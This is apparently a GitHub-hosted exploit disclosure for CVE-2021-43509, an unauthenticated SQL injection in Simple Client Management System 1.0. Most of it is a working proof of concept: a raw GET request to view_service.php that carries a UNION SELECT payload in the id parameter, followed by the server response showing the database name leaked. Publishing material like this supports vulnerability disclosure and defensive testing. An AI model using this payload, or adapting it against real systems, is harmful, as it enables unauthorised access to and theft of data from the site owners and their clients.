Headline
CVE-2021-43509: Simple-Client-Management-System-Exploit/CVE-2021-43509 at main · r4hn1/Simple-Client-Management-System-Exploit
SQL Injection vulnerability exists in Sourcecodester Simple Client Management System 1.0 via the id parameter in view-service.php.
Permalink
Cannot retrieve contributors at this time
# Exploit Title: Simple Client Management System 1.0 - Unauthenticated SQL injection (view_service.php)
# Date: 27/01/2022
# Exploit Author: Rahul Kalnarayan (r4hn1)
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/15027/simple-client-management-system-php-source-code.html
# Version: 1.0
# Category: Webapps
# Tested on: Apache2+MariaDB latest version
# Description : Simple Client Management System 1.0 suffers from SQL injection vulnerability, allowing an un-authenticated user to dump databse.
Vulnerable Page: /cms/admin/maintenance/view_service.php
POC-Request
-----------------------------------
GET /cms/admin/maintenance/view_service.php?id=9999%27%20union%20all%20select%20null,null,concat(database()),null,null,null,null–+ HTTP/1.1
Host: 192.168.1.76
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
---------------------------------------
POC-Response
HTTP/1.1 200 OK
Date: Thu, 27 Jan 2022 17:34:55 GMT
Server: Apache/2.4.38 (Debian)
Set-Cookie: PHPSESSID=radrun69h6fsn08bd53b8spsvq; path=/; secure
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1469
Connection: close
Content-Type: text/html; charset=UTF-8
<style>
#uni_modal .modal-footer{
display:none;
}
</style>
<div class="container-fluid" id="print_out">
<div id=’transaction-printable-details’ class=’position-relative’>
<div class="row">
<fieldset class="w-100">
<div class="col-12">
<dl>
<dt class="text-info">Name:</dt>
<dd class="pl-3"></dd>
<dt class="text-info">Description:</dt>
<dd class="pl-3">cms_db</dd>
<dt class="text-info">Price:</dt>
<dd class="pl-3"></dd>
<dt class="text-info">Status:</dt>
<dd class="pl-3">
<span class="badge badge-danger rounded-pill">Inactive</span>
</dd>
</dl>
</div>
</fieldset>
</div>
</div>
</div>
<div class="form-group">
<div class="col-12">
<div class="d-flex justify-content-end align-items-center">
<button class="btn btn-dark btn-flat" type="button" id="cancel" data-dismiss="modal">Close</button>
</div>
</div>
</div>
<script>
$(function(){
$(‘.table td,.table th’).addClass(‘py-1 px-2 align-middle’)
})
</script>